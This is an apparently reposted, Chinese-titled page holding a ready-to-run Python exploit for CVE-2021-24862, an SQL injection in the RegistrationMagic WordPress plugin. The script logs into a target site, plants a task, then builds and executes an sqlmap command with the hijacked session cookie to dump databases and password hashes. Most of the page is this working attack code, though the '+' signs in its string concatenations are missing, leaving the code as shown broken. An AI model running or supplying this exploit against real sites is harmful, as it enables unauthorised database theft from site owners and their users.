WordPress RegistrationMagic V 5.0.1.5 SQL 注入

2022-03-03 09:16:52 浏览数 (1)

# 版本:<= 5.0.1.5

# 测试环境:Ubuntu 20.04

# CVE:CVE-2021-24862

# CWE:CWE-89

# 文档:https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24862/README.md

'''

描述:

5.0.1.6 之前的 RegistrationMagic WordPress 插件不会在其 rm_chronos_ajax AJAX 操作中转义用户输入

在批量复制任务时在 SQL 语句中使用它之前,这可能会导致 SQL 注入问题。

'''

代码语言:javascript复制
import os

banner = '''
                                                                 
 _____ _____ _____     ___ ___ ___ ___       ___ ___ ___ ___ ___ 
|     |  |  |   __|___|_  |   |_  |_  |  ___|_  | | | . |  _|_  |
|   --|  |  |   __|___|  _| | |  _|_| |_|___|  _|_  | . | . |  _|
|_____|___/|_____|   |___|___|___|_____|   |___| |_|___|___|___|
                                
                           [ ] RegistrationMagic SQL Injection
                           [@] Developed by Ron Jost (Hacker5preme)                                                          
'''
print(banner)
import string
import argparse
import requests
from datetime import datetime
import random
import json
import subprocess

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD


print('[*] Starting Exploit at: '   str(datetime.now().strftime('%H:%M:%S')))

# Authentication:
session = requests.Session()
auth_url = 'http://'   target_ip   ':'   target_port   wp_path   'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://'   target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# Create task to ensure duplicate:
dupl_url = "http://"   target_ip   ':'   target_port   wp_path   'wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2'

# Header:
header = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
    "Accept": "text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Referer": "http://"   target_ip   ':'   target_port   "/wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://"   target_ip,
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-User": "?1"
}

# Body
body = {
    "rmc-task-edit-form-subbed": "yes",
    "rm-task-slide": "on",
    "rmc_task_name": "Exploitdevelopmenthack"   ''.join(random.choice(string.ascii_letters) for x in range(12)),
    "rmc_task_description": "fiasfdhb",
    "rmc_rule_sub_time_older_than_age": '',
    "rmc_rule_sub_time_younger_than_age": '',
    "rmc_rule_fv_fids[]": '',
    "rmc_rule_fv_fvals[]": '',
    "rmc_rule_pay_status[]": "pending",
    "rmc_rule_pay_status[]": "canceled",
    "rmc_action_user_acc": "do_nothing",
    "rmc_action_send_mail_sub": '',
    "rmc_action_send_mail_body": ''
}

# Create project
a = session.post(dupl_url, headers=header, data=body)


# SQL-Injection (Exploit):
exploit_url = 'http://'   target_ip   ':'   target_port   wp_path   'wp-admin/admin-ajax.php'

# Generate payload for sqlmap
print ('[ ] Payload for sqlmap exploitation:')
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')
exploitcode_url = "sqlmap -u http://"   target_ip   ':'   target_port   wp_path   'wp-admin/admin-ajax.php'
exploitcode_risk = ' --level 2 --risk 2 --data="action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids[]=2"'
exploitcode_cookie = ' --cookie="'   cookie   '"'
print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url   exploitcode_risk   exploitcode_cookie   ' '   retrieve_mode   ' -p task_ids[] -v 0'
os.system(exploitcode)
print('Exploit finished at: '   str(datetime.now().strftime('%H:%M:%S')))
sql ajax wordpress 网站建设

0 人点赞